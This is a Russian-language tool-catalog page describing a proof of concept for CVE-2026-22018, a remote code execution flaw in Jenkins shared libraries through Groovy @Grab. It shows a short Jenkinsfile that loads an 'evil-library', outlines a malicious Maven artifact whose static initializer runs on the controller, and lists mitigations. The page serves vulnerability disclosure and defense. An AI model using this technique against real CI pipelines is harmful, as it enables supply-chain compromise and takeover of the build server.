Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab- — PoC для CVE-2026-22018, критической RCE-уязвимости в Jenkins Pipeline Shared Library через Groovy @Grab, демонстрирующий внедрение кода в цепочку поставок и шаги по устранению. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийDevSecOpsБезопасность Цепочки Поставок
GitHubgeorge0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-

CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab-

PoC для CVE-2026-22018, критической RCE-уязвимости в Jenkins Pipeline Shared Library через Groovy @Grab, демонстрирующий внедрение кода в цепочку поставок и шаги по устранению.

Репозиторий
21 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-22018 – Выполнение кода в Jenkins Pipeline Shared Library через @Grab

Код программы (Groovy pipeline)

root@kitploit:~
// Jenkinsfile - loads untrusted shared library
@Library('evil-library@master') _
node {
    evilStep()
}

CVE-2026-22018 – Удалённое выполнение кода в Jenkins Pipeline Shared Library

Severity: Critical

Обзор

Конвейер Jenkins загружает общую библиотеку из источника, которому не полностью доверяет. Библиотека использует аннотацию @Grab для загрузки внешних Maven-артефактов, которые могут включать вредоносный класс, выполняющий код на контроллере Jenkins во время компиляции Groovy.

Детали уязвимости

  • Тип: Внедрение кода / цепочка поставок
  • Воздействие: Полный захват контроллера Jenkins.
  • Корневая причина: Аннотация Groovy @Grab загружает и подгружает произвольные JAR-файлы во время выполнения; общие библиотеки не изолированы в песочнице.

Демонстрация эксплуатации

Настройте конвейер с недоверенной библиотекой, содержащей @Grab('com.evil:malware:1.0') в своём vars/evilStep.groovy. Когда конвейер запускается, статический инициализатор вредоносного JAR-файла выполняется.

Смягчение последствий

  • Используйте только общие библиотеки из доверенных, подписанных SCM-репозиториев.
  • Отключите @Grab с помощью настроек безопасности песочницы Groovy.
  • С осторожностью используйте опцию конвейера «Load implicitly».

Установка и использование

root@kitploit:~
git clone https://github.com/yourorg/CVE-2026-22018.git
cd CVE-2026-22018
# Set up Jenkins in a lab environment to test.
Скачать инструмент